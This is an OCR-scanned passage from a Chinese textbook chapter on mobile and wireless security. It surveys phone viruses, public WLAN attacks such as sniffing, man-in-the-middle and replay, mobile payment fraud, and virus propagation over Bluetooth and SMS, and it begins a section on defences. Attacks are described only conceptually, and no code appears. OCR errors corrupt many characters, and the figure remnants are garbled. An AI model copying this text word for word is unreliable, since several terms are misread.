由 于 无 线 网 络 系统 中 客户 端 设备 ( 即 无 线 设 备 ) 自 身 的 局 限 ,使 其 面临 的 问题 比 苦于 有 
线 网 络 上 的 系统 更 多 ,也 更 加 复杂 。 这 主要 是 由 无 线 设 备 本 身 的 局 限 性 所 决定 的 。 

无 线 设备 的 局 限 性 表现 在 以 下 几 方 面 : 

。 存储 空间 小 。 例 如 手机 、PDA 等 ,没有 数 千 兆 字 节 (GB) 的 内 存 和 几 百 千 兆 字 节 
(GB) 的 硬盘 ,而 这 些 对 PC 而 言 是 非常 普遍 的 。 

。 无 线 设 备 的 计算 能 力 与 PC 不 可 同日 而 语 。 这 决定 了 在 有 线 系统 中 采用 的 公 钥 加 密 
算法 RSA 在 无 线 设 备 中 难 有 用 武之 地 ,所 以 在 无 线 系统 中 通常 采用 椭圆 曲线 加 密 
(Elliptical Curve Cryptograpy, ECC) 技 术 。ECC 基于 复杂 的 数学 算法 ,能 够 以 位 数 
相对 较 少 的 密码 对 数据 实现 保护 ,而 且 加 密 和 人 解密 易于 用 硬件 实现 ,加 解密 速度 比 
较 快 。 

。 无 线 网 络 中 ,连接 一 旦 中 断 ,重新 连接 的 速度 会 受到 影响 。 在 无 线 通信 系统 中 ,传输 
介质 是 无 线 电波 。 无 线 电 波 能 自由 跨越 物理 障碍 ,这 使 得 无 线 网 络 更 容易 受到 攻 





190 网 络 安全 





击 , 传 输 中 的 数据 也 更 容易 被 攻击 者 截获 。 通 过 图 7. 1 的 模型 可 以 看 到 ,在 以 下 4 


个 环节 都 面临 着 安全 问题 。 
辆 ” 
二 对- Internet 一 睫 
于 的 区 二 -一 


7.1 无 线 系统 模型 


(1) 移动 设备 的 物理 安全 。 

移动 设备 通常 都 很 小 巧 ,在 公共 场合 ,如 商场 .出 租车 公共 汽车 ,长途 客车 .火车 等 处 ， 
手机 、PDA 被 资 和 被 主人 大 意 丢失 都 是 常 有 的 事 。 如 果 发 生 了 这 种 情况 ,别人 就 可 以 访问 
移动 设备 上 有 价值 的 数据 ,很 容易 进行 破坏 。 

(2) 无 线 接 人 的 安全 问题 。 

无 线 设 备 可 以 通过 无 线 局 域 网 (WLAN,Wireless Local Area Network) 或 移动 通信 网 
络 接 人 到 Internet 中 ,后 面 将 针对 这 两 种 网 络 环境 进行 讨论 。 

(3) 无 线 网 关 到 Internet 的 安全 。 

数据 从 移动 终端 传递 到 无 线 网 关 之 后 ,无 线 网 关 ( 如 WAP 网 关 ) 会 验证 WTLS 
(Wireless Transport Layer Security ,无线 传输 层 安全 ) 证 书 并 对 数据 先进 行 解密 ,然后 按照 
有 线 网 络 中 商定 的 加 密 策略 重新 加 密 后 传递 到 Internet。 反 之 ,对 于 从 Internet 接收 到 的 
数据 ,无 线 网 关 也 会 先 解密 ,再 用 与 移动 终端 商定 的 基于 WTLS 的 会 话 密 钥 加 密 后 传递 给 
移动 终端 。 在 这 个 阶段 ,主要 的 安全 问题 是 : 无 线 网 关 在 加 密 解 密 数 据 的 过 程 中 ,可 能 暂时 
将 数据 保存 到 硬盘 ,这 就 可 能 产生 被 黑客 利用 的 风险 。 

(4) 其 他 。 

。 从 Internet 到 网 络 各 站 点 的 通信 安全 。 

。 网 站 服务 器 和 数据 库 的 安全 。 

在 上 述 几 个 环节 中 ,前 3 个 与 无 线 系统 直接 相关 ,而 其 他 的 则 是 有 线 与 无 线 网 络 系统 所 
共同 面 对 的 问题 。 


7.1.1 智能 手机 遭遇 病毒 


早期 手机 病毒 经 常 是 以 垃圾 短信 的 形式 出 现 , 最 早 的 手机 病毒 可 以 追溯 到 2000 年 6 
月 。 当 时 很 多 西班牙 手机 用 户 无 故 收 到 一 些 承 载 不 良 信息 的 垃圾 短信 ,经 有 关 部 门 查证 ,得 
一 个 出 人 意料 的 结论 一 一 发 现 了 手机 病毒 ,被 命名 为 VBS. Timofonica ,其实 该 病毒 最 多 
只 能 算 作 短 信 炸 弹 。 较 早出 现在 Android 系统 上 的 木马 程序 也 是 短信 诈骗 木马 。 
病毒 刚 开始 出 现时 只 是 用 来 证 明 其 概念 ,但 很 快 被 不 良 企图 的 人 所 滥用 。 真 正 意义 上 
的 手机 病毒 是 2004 年 的 Cabir 蠕虫 病毒 , 它 会 不 断 寻 找 附 近 开 启 蓝 牙 连接 的 手机 ,并 尝试 
向 其 发 送 自身 的 副本 ,通过 中 毒手 机 发 送 增值 服务 短信 , 借 此 一 利 。 
目前 手机 上 安装 防毒 /杀毒 软件 的 还 较为 少见 ,虽然 从 侧面 说 明 目 前 病毒 的 危害 性 较 
小 ,但 随 着 3G、4G 甚至 5G 的 来 临 ,手机 日 益 接 近 一 部 小 型 计算 机 ,可 以 做 到 的 事情 越 来 越 
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多 ,手机 病毒 的 危害 也 必 将 越 来 越 大 。 

无 论 是 浏览 网 站 还 是 下 载 图 片 应 用 文档 /程序 、 移 动 搜索 等 ,都 有 可 能 出 现 安全 漏洞 ， 
手机 病毒 通常 通过 附着 下 载 .蓝牙 收发 等 方式 侵入 手机 。 

手机 病毒 的 特征 表现 为 静默 联网 、 删 除 短信 发送 短信 、 开 机 自 启动 、 键 盘 被 锁 、 破 坏 手 
机 IC 卡 等 。 其 中 静默 联网 会 导致 手机 用 户 资费 消耗 ,同时 病毒 还 会 通过 联网 功能 将 用 户 手 
机 上 的 隐私 信息 ,包括 手机 网 银 、 支 付 相关 账号 密码 等 内 容 上 传 至 指定 位 置 , 导 致 用 户 隐私 
泄露 和 财产 风险 。 

从 某 些 方面 来 说 ,手机 被 黑 比 计算 机 被 黑 更 可 怕 , 想 想 看 ,我 们 私密 的 信息 会 被 人 看 到 ， 
我 们 的 通话 记录 会 被 人 窃取 ,我 们 的 位 置 会 被 别人 时 刻 关注 ,我 们 的 支付 过 程 会 被 盯梢 ,其 
至 我 们 的 财产 账户 信息 会 被 窃取 ,这 些 信息 有 可 能 会 被 人 利用 以 进行 经 济 犯 罪 .政治 诱骗 和 
违法 胁迫 等 。 


7.1.2 便携 设备 丢失 与 数据 泄露 


在 互联 网 金融 时 代 ,小 小 的 手机 装载 着 越 来 越 多 的 与 理财 相关 功能 的 APP, 例 如 支付 
宝 、 微 信 、 银 行 应 用 等 ,一 旦 丢失 后 果 不 堪 设 想 。 如 果 便 携 设备 丢失 或 被 资 ,比如 手机 ,就 丢 
掉 了 便携 设备 里 的 全 部 重要 信息 (包括 隐私 、 财 产 等 ) ,不 仅 意味 着 有 些 人 可 能 将 永远 无 法 联 
系 ,更 恐怖 的 是 ,里 面 有 大 量 的 财产 数据 和 隐私 数据 ,将 会 对 我 们 的 生活 造成 巨大 的 影响 , 造 
成 的 绝 不 仅仅 是 一 部 手机 的 损失 。 

例如 支付 宝 , 许 多 人 的 登录 名 就 是 手机 号 ; 而 登录 密码 通过 单 击 “ 忘 记 密码 ”, 一 个 手机 
验证 码 就 能 找 回 。 也 就 是 说 你 只 要 有 了 手机 ,账号 和 登录 密码 就 都 有 了 ,而 支付 宝 账号 如 果 
装 有 数字 证 书 ,一 个 短信 就 可 以 解除 。 据 报道 ,2015 年 12 月 ,南宁 市 民 吴 女士 被 小 偷偷 走 
了 价值 5000 多 元 的 手机 。 在 随后 的 两 天 时 间 里 ,她 手机 内 的 支付 软件 账户 被 修改 密码 ,3 
张 银 行 卡 里 面 的 钱 也 被 窃取 一 空 ,又 损失 了 4000 多 元 。 仅 一 天 , 吴 女 士 就 发 ”出 了 12 个 近 
200 元 的 红包 。 


7.1.3 公共 WLAN 不 安全 


使 用 IEEE 802. 11 搭建 的 WLAN 存在 很 多 不 安全 因素 ,主要 表现 在 以 下 几 方 面 : 

。 不 合理 的 无 线 接 人 点 (Access Point,AP) 的 设置 。 

。 AP 和 无 线 终端 之 间 的 不 安全 连接 。 

。 无 线 信 号 泄漏 。 

。 不 可 靠 的 加 密 措 施 。 

通常 对 无 线 局 域 网 络 采取 的 攻击 方式 大 体 上 可 以 分 为 两 类 : 被 动 式 攻击 和 主动 式 

攻击 。 

被 动 式 攻击 包括 网 络 窃听 和 网 络 通信 量 分 析 等 .例如 : 

。 嗅 探 和 流量 分 析 。 攻 击 者 甚至 不 需要 位 于 企业 建筑 物 内 部 ,他 们 可 以 在 移动 的 交通 
工具 上 使 用 笔记 本 电脑 或 其 他 移动 设备 , 仅 需 将 无 线 网 卡 设置 为 混杂 模式 ,并 安装 
一 个 可 以 捕获 数据 报 文 的 工具 软件 (如 Sniffle、Netstumbler 等 工具 ) ,就 可 以 探测 出 
存在 的 无 线 网 络 。 在 发 现 无 线 网 络 后 ,最 基础 、 最 简单 的 攻击 行为 就 是 进行 流量 分 
析 , 即 攻击 者 可 以 捕获 到 网 络 流量 并 对 其 进行 分 析 。 通 过 流量 分 析 , 攻 击 者 可 获知 
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AP 的 位 置 和 标识 、 用 户 信 息 和 网 络 中 传输 的 协议 类 型 等 数据 信息 ,这 将 是 发 起 后 续 
攻击 的 基础 。 

。 窃听 。 人 窃听 是 指 被 动 地 监听 无 线 会 话 , 或 攻击 者 主动 地 注入 一 些 消息 来 获取 更 多 的 
会 话 内 容 。 这 种 攻击 只 要 攻击 者 能 收 到 无 线 信号 就 可 以 进行 ,因此 采用 物理 级 别 的 
安全 措施 一 般 很 难 阻止 这 种 攻击 。 如 果 会 话 没有 加 密 , 攻 击 者 就 能 够 窃听 到 通信 双 
方 传送 的 数据 信息 ,为 以 后 更 危险 的 攻击 做 好 准备 。 

主动 攻击 包括 拒绝 服务 攻击 、 信 息 自 改 ,资源 使 用 .欺骗 等 ,例如 : 

。 中 间 人 攻击 。 其 目的 是 从 一 个 会 话 中 获得 用 户 的 私有 数据 或 修改 数据 报 文 ,从 而 破 
坏 数据 的 完整 性 。 中 间 人 攻击 属于 实时 攻击 , 即 在 目标 会 话 过 程 中 实施 攻击 。 首 
先 ,攻击 者 要 破坏 目标 (如 手机 ) 和 AP 之 间 的 会 话 连接 ,使 其 无 法 进行 会 话 ; 然后 ， 
攻击 者 将 自己 伪装 成 AP, 和 目标 建立 关联 并 认证 ,同时 攻击 者 伪装 成 目标 并 与 真正 
的 AP 进行 关联 和 认证 ; 最 后 ,目标 和 真正 的 AP 和 都 被 攻击 者 所 欺骗 ,这 样 攻击 者 
可 以 轻易 地 获得 会 话 内 容 和 数据 报 文 ,并 进行 相应 的 处 理 。 

。 重 放 攻击 。 其 目标 是 破坏 网 络 中 信息 传输 的 完整 性 ,主要 目的 是 利用 受害 者 的 身份 
和 权限 非法 使 用 网 络 , 这 种 攻击 是 非 实 时 的 。 在 重 放 攻击 中 ,攻击 者 首先 要 获得 会 
话 中 的 认证 信息 (例如 某 次 登录 WLAN 的 过 程 ) ,延迟 一 段 时 间 后 重新 发 送 这 些 数 
据 包 。 由 于 会 话 是 有 效 的 ,因此 攻击 者 利用 这 些 报 文 可 建立 一 个 合法 会 话 , 非 法 使 
用 网 络 资源 。 

。 欺诈 性 接 入 点 。 是 指 在 未 获得 无 线 网 络 所 有 者 的 许可 或 知晓 的 情况 下 就 设置 或 存 
在 的 接 入 点 。 这 相当 于 自行 设置 了 一 个 隐蔽 的 无 线 网 络 ,可 以 绕 开 已 设置 的 安全 措 
施 。 这 种 秘密 网 络 可 以 构造 出 一 个 无 保护 措施 的 网 络 , 进 而 方便 攻击 者 对 内 部 网 络 
的 入侵 。 

。 窃取 网 络 资源 。 有 些 用 户 会 从 邻近 、 可 以 访问 到 的 无 线 网 络 接 人 互联 网 ,即使 他 们 
没有 恶意 企图 , 仍 会 占用 大 量 的 网 络 带宽 ,严重 影响 网 络 性 能 ,更 严重 的 还 会 产生 一 
些 法 律 问题 。 

而 目前 公共 场所 的 WiFi 主要 有 两 类 ,一 种 是 有 电信 运营 商 提供 的 WiFi 热点 , 另 一 种 

是 商家 为 招揽 客户 自行 搭建 的 WiFi, 而 这 两 种 WiFi 在 技术 上 是 有 着 很 大 差别 的 。 前 者 无 
论 是 否 免费 ,都 是 采用 电信 运营 级 的 网 络 设备 ,性 能 稳定 ,部 署 多 种 安全 措施 ,而 后 者 则 大 多 
使 用 民用 级 WiFi 设备 , 且 后 台 没 有 进行 专门 的 安全 性 设置 ,有 的 甚至 连 密码 都 没有 ,这 就 
给 黑客 留 下 乘虚 而 人 的 机 会 。 黑 客 只 需 凭 借 一 些 简单 设备 ,就 可 监视 WiFi 上 任何 人 正在 
浏览 的 内 容 ,别人 的 用 户 名 密码 也 能 轻易 获取 。 

所 以 ,如 果 只 是 浏览 一 些 网 页 还 并 不 是 那么 重要 ,但 如 果 是 一 些 重要 的 登录 信息 ,包括 

转账 等 工作 ,还 是 尽量 不 要 在 不 了 解 的 公共 网 络 上 进行 。 


7.1.4 移动 支付 安全 严峻 


移动 支付 是 在 现 有 通信 技术 (如 WiFi、Bluetooth 等 ) 的 基础 上 提出 的 , 指 消费 者 为 了 达 
成 商品 或 服务 的 交易 业务 ,通过 移动 终端 设备 来 实现 的 支付 操作 。 目 前 ,已 经 拥有 了 越 来 越 
多 的 移动 支付 手段 ,如 扫 码 付 \ 声 波 当面 付 , 亲 密 付 ,以 及 红包 支付 .手机 远程 支付 二 维 码 支 
付 、 手 机 短信 支付 等 。 


第 7 章 移动 互联 安全 技术 193 





当前 ,传统 金融 机 构 互联 网 公司 等 产业 都 大 力 推动 移动 支付 的 普及 ,通过 与 打车 、 医 
疗 、 旅 游 .停车 ,便利 店 、 订 和 餐 等 日 常 消费 类 行业 商户 合作 ,引导 用 户 消 费 习 惯 逐 步 向 移动 端 
迁移 。 但 是 移动 支付 的 安全 性 是 一 个 非常 严峻 的 问题 。 

通过 虚假 WiFi、 钓 鱼网 站 等 方式 ,移动 支付 设备 容易 被 病毒 或 木马 所 侵袭 ,或 者 支付 软 
件 自身 存在 漏洞 ,这 些 都 可 能 会 造成 支付 隐患 。 同 时 ,移动 支付 所 追求 的 就 是 便捷 的 用 户 体 
验 ( 比 互联 网 支付 程序 更 加 简易 ) ,这 就 降低 了 支付 安全 性 ,因为 便捷 与 安全 往往 是 矛盾 的 关 
系 。 所 有 这 些 ,都 可 能 对 资金 和 交易 安全 产生 影响 。 央 视 3。 15 晚会 曾 报道 ,用户 在 网 购 的 
时 候 , 扫 了 卖家 发 来 的 二 维 码 ,手机 就 被 安装 了 网 银 神偷 病毒 ,网 银 神 偷 可 窃取 用 户 身 份 证 
号 以 及 手机 验证 码 , 最 终 把 支付 宝 、 余 额 宝 中 的 钱 转 走 。 

长 期 以 来 我 国 对 于 个 人 信息 、 隐 私 的 保护 机 制 都 较为 缺失 ,在 互联 网 支付 中 已 经 出 现 过 
类 似 的 用 户 信息 泄露 事件 ,而 在 更 加 开放 的 移动 支付 环境 下 ,这 一 问题 变 得 更 加 突出 。 


7.1.5 广告 不 能 随便 点 开 


手机 广告 行业 存在 的 一 些 鲜 为 人 知 但 触目 惊 心 的 黑幕 。 不 少 手机 用 户 在 安装 APP 后 ， 
不 断 弹出 各 类 广告 , 令 人 烦 扰 。 有 些 APP 为 了 获取 用 户 信息 ,甚至 在 广告 中 植 人 恶意 代码 ， 
用 于 窃取 用 户 隐私 等 ,严重 侵犯 消费 者 利益 。 

一 些 第 三 方 广告 平台 在 向 用 户 推送 广告 的 同时 ,额外 搜集 用 户 的 个 人 信息 并 上 传 。 虽 
然 其 目的 自称 为 统计 广告 投放 的 地 域 . 运 营 商 、 手 机 品牌 等 数据 报表 ,可 以 帮助 广告 业主 更 
加 了 解 广告 受众 的 用 户 特性 ,但 是 这 些 手机 信息 都 有 可 能 被 窃取 和 非法 利用 ,给 用 户 隐私 带 
来 不 利 影响 。 

据 研 究 机 构 分 析 统 计 ,53% 的 广告 都 有 上 传 手机 IMEI( 国 际 移动 设备 身份 码 ) 和 IMSI 
(国际 移动 用 户 识别 码 ) 的 行为 ,19% 的 广告 会 上 传 手机 地 理 位 置 ,15% 的 广告 会 上 传 手机 号 
码 信息 ,甚至 还 有 恶意 广告 上 传 通讯 录 、 通 话 记录 ,短信 记录 等 重要 隐私 信息 的 恶意 行为 。 
其 中 , 占 比 最 多 的 是 频繁 推送 广告 和 静默 下 载 。 


7.2 手机 病毒 


当前 绝 大 多 数 手机 都 属于 智能 手机 ,智能 手机 具有 冯 。 诺 依 曼 结构 。 计 算 机 病毒 的 专 
家 科恩 曾 证 明 , 冯 。 诺 依 曼 结构 的 计算 机 不 可 避免 地 会 有 病毒 存在 ,所 以 智能 手机 具有 了 存 
在 手机 病毒 的 可 能 性 。 


7.2.1 手机 病毒 概述 


同 计算 机 病毒 一 样 ,手机 病毒 具有 以 下 特性 : 

。 传播 性 。 手 机 病毒 具有 把 自身 复制 到 其 他 设备 /程序 的 能 力 , 手 机 病毒 可 以 自我 传 
播 ,也 可 以 将 感染 的 文件 作为 传染 源 , 并 借助 该 文件 的 交换 、 复 制 后 再 传播 ,进而 感 
染 更 多 的 设备 。 

。 隐藏 性 。 病 毒 的 存在 、 传 染 和 对 数据 的 破坏 过 程 不 易 被 用 户 所 发 觉 ,病毒 通常 隐藏 
在 被 感染 的 合法 程序 中 , 当 用 户 调用 该 程序 时 ,病毒 乘机 窃取 系统 的 控制 权 ,并 执行 
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病毒 程序 ,而 这 些 行为 是 在 用 户 没有 察觉 的 情况 下 完成 的 。 而 且 为 了 提高 生存 率 ， 
如 今 的 病毒 开始 采用 更 先进 的 技术 来 伪装 自己 ,如 Rootkit 技术 。 该 技术 最 早出 现 
在 计算 机 领域 中 ,使 用 操作 系统 最 高 权限 来 隐藏 程序 进程 的 技术 ,后 来 逐渐 成 为 隐 
藏 黑客 人 侵 痕 迹 和 伪装 恶意 程序 的 手段 。 

。 可 和 触发 性 。 病 毒 的 发 作 一 般 都 需要 一 个 激发 条 件 , 可 以 是 日 期 .时 间 、 特 定 程序 的 运 
行 等 ,如 果 没 有 被 激活 , 则 会 安静 地 潜伏 在 系统 中 。 

。 破坏 性 。 无 论 何 种 手机 病毒 ,一 旦 侵入 手机 都 会 对 手机 软 硬 件 运 行 造成 不 同 程 度 的 
影响 , 较 轻 的 会 降低 系统 性 能 ,破坏 数据 和 文件 导致 系统 崩溃 ,严重 的 将 可 能 损坏 
硬件 。 

手机 病毒 的 发 展 大 致 呈 以 下 3 个 阶段 : 

(1) 短信 病毒 阶段 。 

这 类 手机 病毒 利用 普通 手机 芯片 中 固化 程序 的 缺陷 ,通过 网 络 向 这 些 手机 发 送 特殊 字 
符 的 短信 , 当 用 户 观 看 时 就 会 导致 固化 在 手机 中 的 程序 出 现 异常 。 例 如 ,西门 子 的 某 系 列 手 
机 当 收 到 *%String” 形 式 的 短信 (如 %English) 时 ,会 作为 操作 命令 执行 ,从 而 导致 在 查看 该 
类 短信 时 死机 。 由 于 普通 手机 的 能 力 有 限 , 该 阶段 的 病毒 传播 性 不 强 , 只 限于 同 厂 家 的 同系 
列 手 机 。 

(2) 诱骗 型 病毒 阶段 。 

随 着 PDA ,智能 手机 等 产品 开始 大 量 涌现 ,这 些 产 品 本 身 具 有 通用 的 操作 系统 ,可 以 执 
行程 序 ,安装 软件 。 手 机 病毒 正 是 利用 了 操作 系统 开放 的 接口 编写 病毒 ,然后 利用 人 们 的 政 
忽 .好 奇 心 和 信任 来 达到 传播 的 目的 。 比 如 病毒 会 把 自身 的 副本 隐藏 在 手机 游戏 中 ,或 依附 
在 一 些 标题 具有 吸引 力 的 彩信 中 ,用 户 一 旦 下 载 安装 或 单 击 查看 ,手机 就 会 被 感染 。 目 前 的 
大 部 分 手机 病毒 都 属于 此 类 型 病毒 。 此 类 病毒 一 般 需 要 用 户 互动 才能 感染 或 激活 ,传播 范 
围 和 危害 性 有 限 。 

(3) 漏洞 型 病毒 阶段 

病毒 直接 利用 手机 操作 系统 (或 手机 应 用 程序 ) 的 漏洞 进行 传播 和 攻击 。 例 如 ,目前 已 
经 出 现 有 关 Windows Mobile 手机 的 IE 浏览 器 、 图 像 和 视频 播放 器 软件 存在 漏洞 的 报道 ， 
用 户 在 观看 一 个 恶意 制作 的 HTML 网 页 或 者 JPEG 图 像 文档 时 ,会 让 手机 运行 陷入 崩溃 ， 
进而 被 攻击 者 利用 。 更 麻烦 的 是 ,手机 操作 系统 存储 在 ROM 中 ,普通 用 户 一 般 没 有 能 力 自 
行 更 新 升级 ,这 就 使 得 利用 手机 操作 系统 漏洞 的 病毒 危害 时 间 更 长 ,危害 效果 更 大 。 

终端 越 智 能 ,功能 越 复杂 ,安全 漏洞 就 越 多 , 受 病毒 感染 或 被 黑客 攻陷 的 可 能 性 也 就 越 
大 。 整 体 上 来 看 ,手机 病毒 目前 还 处 在 诱骗 型 阶段 ,但 从 长 远 来 看 ,漏洞 型 手机 病毒 将 是 未 
来 发 展 的 趋势 ,一 旦 进入 这 个 阶段 ,手机 病毒 造成 的 危害 及 负面 影响 将 急剧 扩大 。 特 别 是 
Rootkit 型 病毒 带 来 的 威胁 最 大 ,Rootkit 病毒 常 作为 驱动 程序 安装 在 手机 系统 的 内 核 中 , 通 
过 修改 系统 内 核 代 码 来 改变 系统 核心 程序 /数据 ,利用 LKMO 技术 截获 部 分 系统 调用 ,创建 
病毒 运行 的 环境 。 而 通常 的 反 病 毒 工 具 只 能 运行 在 用 户 模式 下 ,这 种 运行 在 内 核 模式 下 的 
病毒 能 轻松 绕 开 反 病毒 工具 的 检测 。 


@ LKM(Loadable Kernel Modules, 可 加 载 内 核 模块 程序 ) 是 一 种 区 别 于 一 般 应 用 程序 的 系统 级 程序 , 它 主要 用 于 
扩展 Linux 的 内 核 功能 。 
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手机 病毒 的 攻击 对 象 包括 两 类 : 

。 手 机 终端 主要 是 对 个 人 设备 进行 攻击 ,手机 病毒 可 能 会 造成 个 人 经 济 \ 信 誉 \ 设 备 
和 信息 的 丧失 。 

。 移动 通信 网 络 。 主 要 是 对 移动 通信 网 络 提供 商 进行 攻击 ,手机 病毒 可 能 会 造成 服务 
中 断 和 网 络 瘫痪 等 事故 。 


7.2.2 手机 病毒 的 传播 


手机 病毒 主要 是 通过 用 户 使 用 手机 进行 交流 时 传播 的 ,包括 连接 本 机 以 外 的 硬件 (如 用 
蓝牙 功能 与 其 他 手机 连接 ) ,或 者 是 使 用 无 线 上 网 (如 2G、3G、4G 等 网 络 上 网 ) ,以 及 通过 数 
据 线 与 计算 机 联系 (如 下 载 安 装 一 些 未 经 验证 的 软件 ) 等 。 

手机 病毒 根据 传播 方式 划分 为 以 下 几 类 : 

。 通过 手机 外 部 接口 进行 传播 。 例 如 蓝牙 .红外 等 ,代表 性 的 就 是 前 面 提 到 的 Cabir 
手机 病毒 ,中 毒手 机 会 通过 蓝牙 功能 搜索 附近 开启 蓝牙 接口 的 其 他 手机 ,并 向 后 者 
不 停 发 送 蓝 牙 连 接 请 求 , 直 到 对 方 接受 或 者 离开 其 作用 范围 。 

。 基站 植 和 人 。 通 过 制作 专门 的 基站 , 当 基站 覆盖 范围 内 的 手机 连接 到 该 基站 时 ,基站 
把 木马 信息 传播 到 指定 的 手机 上 。 该 方式 实现 难度 较 大 。 

。 通过 手机 业务 应 用 进行 传播 。 例 如 SMS(Short Messaging Service, 短信 业务 )、 
MMS(Multimedia Messaging Service, 多 媒体 短信 业务 , 即 彩信 ?等 ,木马 程序 可 以 
被 打包 成 为 信息 的 一 部 分 进行 传播 并 植 人 。 典 型 的 例子 是 CommWarrior, 它 能 够 
向 手机 号 码 敌 中 的 联系 人 发 送 隐 藏 自身 副本 的 彩信 。 

。 借助 网 关 植 入。 手机 通过 发 送 含 木马 程序 的 数据 给 网 关 ( 例 如 WAP 服务 器 与 短信 
平台 等 ) ,网 关 染 毒 后 再 把 木马 传染 给 其 他 终端 。 

。 通过 互联 网 接 入 进行 传播 。 手 机 登录 不 安全 网 站 进行 浏览 、 接 发 电子 邮件 ,安装 网 
络 游戏 .下 载 程序 等 。 例 如 ,蚊子 木马 病毒 被 拥 绑 在 手机 游戏 “ 打 蚊 子 ” 的 破解 版 中 ， 
只 要 用 户 下 载 并 运行 该 游戏 ,病毒 即 被 激活 ,然后 会 在 用 户 毫 不 知情 的 情况 下 向 一 
些 特定 号 码 发 送 短 信 , 从 而 造成 用 户 手 机 话费 超额 。 

。 通过 数据 线 / 存 储 卡 与 PC 交叉 感染 。 大 部 分 智能 手机 能 够 通过 可 插 拔 的 存储 卡 与 
PC 之 间 进 行 数据 交换 ,用 户 也 可 以 通过 PC 数据 线 对 智能 手机 进行 程序 安装 、 文 件 
管理 等 操作 ,一 些 手 机 病毒 则 趁机 进行 交叉 传播 。 如 2005 年 出 现 的 手机 病毒 
Velasco, 可 在 Windows 操作 系统 上 运行 ,能 够 自动 搜索 PC 硬盘 上 后 级 为 . SIS 的 手 
机 可 执行 文件 并 进行 感染 ,用 户 一 旦 将 该 文件 传 向 手机 ,该 手机 即 被 感染 。 而 2005 
年 发 现 的 手机 病毒 Cardtrap. A, 则 是 能 从 智能 手机 扩散 到 用 户 计算 机 上 的 木马 程 
序 , 它 能 向 被 感染 的 手机 存储 卡 中 释放 两 种 蠕虫 程序 ,如 果 用 户 将 该 存储 卡 插 入 到 
计算 机 中 , 它 会 试图 感染 PC。 

下 面 首先 介绍 蓝牙 传播 方式 。 

当 蓝 牙 设备 启动 后 , 驻 留 在 感染 手机 上 的 病毒 就 被 激活 。 病 毒 的 传播 过 程 可 分 为 如 下 

几 个 阶段 : 
(1) 搜索 其 无 线 发 射 范围 内 的 邻居 蓝牙 设备 ,并 建立 邻居 节点 列表 。 
(2) 遍历 该 列表 ,试图 对 列表 中 的 每 一 个 邻居 节点 建立 连接 并 进行 感染 。 
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(3) 遍历 完 邻居 节点 列表 后 ,返回 空闲 状态 。 
(4) 等 待 一 段 时 间 后 继续 下 一 个 感染 周期 。 
病毒 通过 蓝牙 进行 传播 的 过 程 如 图 7. 2 所 示 。 
































空闲 状态 = 
根据 搜索 结果 ， 搜索 射频 范围 内 
建立 邻居 列表 的 所 有 蓝牙 设备 
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从 列表 中 选取 一 个 邻居 | _ 
节点 ， 试 图 建立 连接 























复制 病毒 程序 到 该 节点 
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断 开 连 接 
































下 


7.2 病毒 通过 蓝牙 进行 传播 的 过 程 


病毒 通过 SMS/MMS 进行 传播 的 方法 有 两 种 ,一 是 直接 将 恶意 代码 本 身 加 入 到 MMS 
中 ,二 是 将 恶意 代码 的 URL 链接 加 入 到 SMS/MMS 中 。 病 毒 利用 SMS/MMS 进行 传播 的 
过 程 如 下 : 

(1) 寻找 目标 。 病 毒 在 感染 手机 的 号 码 短 .通信 历史 记录 中 搜索 可 用 的 号 码 , 这 些 号 码 
就 成 为 了 攻击 目标 。 

(2) 将 自身 复制 并 发 送出 去 。 病 毒 扫描 到 可 用 的 目标 号 码 后 ,就 将 自身 复制 并 发 送 
出 去 。 

(3) 激活 病毒 代码 。 病 毒 代码 到 达 接 收 端 后 ,并 不 会 自动 运行 ,等 待 用 户 的 激活 。 

在 第 三 步 , 手 机 病毒 需要 想 尽 办 法 来 诱导 用 户 激 活 病毒 代码 。 病 毒 可 以 利用 好 友 身 份 
的 信任 ,另外 也 可 以 利用 各 种 各 样 具有 欺骗 性 的 标题 和 内 容 来 诱骗 人 们 单 击 链接 或 者 下 载 
附件 。 例 如 ,Sexy View 病毒 就 是 利用 人 们 对 其 标题 的 好 奇 心 .引诱 用 户 打开 附件 ,从 而 激 
活 病毒 代码 。 


7.2.3 手机 病毒 防护 技术 
智能 手机 发 展 势头 十 分 迅猛 。 而 智能 手机 基于 开放 式 操作 系统 ,因此 很 容易 被 各 种 各 


站 
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样 手机 病毒 攻击 ,在 移动 通信 业务 飞速 发 展 的 当前 ,如 何 防范 手机 病毒 已 经 成 为 智能 手机 发 
展 中 必须 解决 的 重要 目标 。 
对 手机 病毒 的 防范 可 以 从 终端 .网络 端 和 个 人 习惯 3 方面 进行 ( 见 图 7. 3)。 


下 





























病毒 、 木 马 、 蠕虫 
病毒 保护 
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垃圾 短信 
四 防火 墙 上 
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保密 内 容 SMS/MMS/WAP 网 关 
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7.3 手机 病毒 防范 


从 手机 终端 进行 防范 


1) 增强 智能 手机 自身 安全 

手机 病毒 的 开发 基础 之 一 就 是 手机 的 安全 漏洞 ,只 要 减少 或 者 杜绝 手机 安全 漏洞 ,就 可 
以 避免 手机 病毒 的 侵扰 。 故 此 ,有 必要 应 用 安全 可 靠 的 智能 手机 平台 ,安全 手机 操作 系统 是 
重 中 之 重 , 安 全 的 智能 手机 操作 系统 要 具有 以 下 基本 特征 : 


身份 验证 特征 。 确 保 所 有 访问 的 用 户 身 份 真实 可 信 。 不 同 角 色 用 户 访问 智能 手机 
前 ,手机 应 对 用 户 的 身份 进行 认证 ,识别 用 户 所 对 应 的 角色 ,然后 根据 用 户 的 角色 对 
用 户 进行 授权 。 可 以 采用 的 身份 认证 方式 有 口令 认证 ,智能 卡 认证 ,生物 特征 识别 
及 实体 鉴别 机 制 等 方式 ,并 根据 手机 要 达到 的 安全 要 求 , 选 用 其 中 的 一 种 或 者 几 种 
的 组 合 。 

最 小 特权 特征 。 根 据 每 个 用 户 身 份 验证 的 结果 ,只 向 其 提供 刚好 能 完成 所 属 工 作 的 
权力 。 

安全 审计 特征 。 手 机 需 对 操作 (一 般 指 关 键 性 操作 ) 的 错误 尝试 次 数 及 相关 安全 事 
件 进行 记录 、 分 析 的 过 程 。 通 过 分 析 记 录 结 果 , 移 动 终端 可 判断 发 生 了 哪些 安全 相 
关 活 动 , 并 自动 根据 分 析 结 果 来 采取 预先 设 定 的 安全 措施 。 另 外 检查 审计 记录 结果 
还 可 以 帮助 分 析 潜 在 攻击 。 

安全 域 隔离 特征 。 对 移动 终端 中 的 物理 存储 空间 进行 划分 ,不 同 的 存储 空间 用 于 存 
储 不 同 的 数据 或 代码 。 

